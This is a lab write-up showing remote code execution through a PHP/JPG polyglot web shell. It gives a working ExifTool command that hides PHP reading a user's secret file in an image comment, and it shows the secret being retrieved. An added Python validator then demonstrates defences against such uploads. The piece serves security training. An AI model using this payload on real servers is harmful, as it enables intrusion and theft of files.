Remote code execution via polyglot web shell upload

This lab contains a vulnerable image upload function. Although it checks the contents of the file to verify that it is a genuine image, it is still possible to upload and execute server-side code.

Upon logging in, I attempted to upload a PHP script as my avatar, aiming to fetch the contents of Carlos's secret. However, the server thwarted my efforts by blocking any file uploads that weren't recognized as images.

Undeterred, I devised a workaround. I created a polyglot PHP/JPG file: to the image check it looks like a normal JPEG, but it embeds my PHP payload in the image metadata. Using ExifTool, I wrote the payload into the Comment field of the image and saved the result with a .php extension:

exiftool -Comment="<?php echo 'ICHYABOY ' . file_get_contents('/home/carlos/secret') . ' ICHYABOY'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php

This turned a seemingly innocent image into a dual-purpose file: it still passes as a standard JPG, yet because it is saved with a .php extension the server executes the PHP embedded in its metadata when the file is requested.

Next, I uploaded this polyglot image as my avatar through the browser and returned to my account page. In Burp's proxy history, I located the GET /files/avatars/polyglot.php request. Using the message editor's search feature, I pinpointed the ICHYABOY string within the binary image data in the response. Between the two ICHYABOY strings, I found Carlos's secret:

ICHYABOY ********************* ICHYABOY

Successfully retrieving Carlos's secret, I submitted it to solve the lab, showcasing the power of crafting polyglot files for creative exploitation.
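As an added, defender-side example (not part of the original write-up): a Python upload validator showing why the lab's content check alone is insufficient. It rejects a file whose claimed extension does not match its magic bytes, scans the whole file, metadata included, for server-side script tags, and derives the stored filename from the detected image type rather than from the user-supplied name. The allow-list, messages and the JPEG fixture are assumptions made for this example.

```python
import re
import secrets
import struct
from pathlib import PurePosixPath

# Allow-list of image types by magic bytes (hypothetical policy for this example).
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
ALIASES = {".jpeg": ".jpg"}
# Server-side script markers that never belong in an image, metadata included.
SCRIPT_TAG = re.compile(rb"<\?(?:php\b|=)|<%|<script\b", re.IGNORECASE)

def detect_image_type(data: bytes):
    """Return the canonical extension implied by the magic bytes, or None."""
    for ext, sigs in IMAGE_MAGIC.items():
        if any(data.startswith(sig) for sig in sigs):
            return ext
    return None

def validate_upload(filename: str, data: bytes) -> list:
    """Collect every reason to reject the upload; an empty list means accept."""
    reasons = []
    claimed = PurePosixPath(filename).suffix.lower()
    claimed = ALIASES.get(claimed, claimed)
    detected = detect_image_type(data)
    if detected is None:
        reasons.append("content is not a recognised image")
    if claimed not in IMAGE_MAGIC:
        reasons.append(f"extension {claimed or '(none)'} is not an allowed image type")
    elif detected is not None and detected != claimed:
        reasons.append(f"extension {claimed} does not match content type {detected}")
    # The polyglot passes the magic-byte check; only a byte-level scan of the
    # whole file, EXIF/COM segments included, catches the embedded PHP.
    if SCRIPT_TAG.search(data):
        reasons.append("embedded server-side script tag found")
    return reasons

def storage_name(data: bytes) -> str:
    """Random name plus the *detected* type; call only after validation passes,
    so a user-chosen .php name can never reach the web root."""
    return secrets.token_hex(16) + detect_image_type(data)

def build_jpeg_with_comment(comment: bytes) -> bytes:
    """Constructed test fixture: a minimal JPEG whose COM (0xFFFE) segment holds
    `comment`, mimicking the Comment field the write-up fills with ExifTool."""
    return b"\xff\xd8\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment + b"\xff\xd9"
```

Serving the uploads directory with script execution disabled remains the primary control; the scan is defence in depth.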
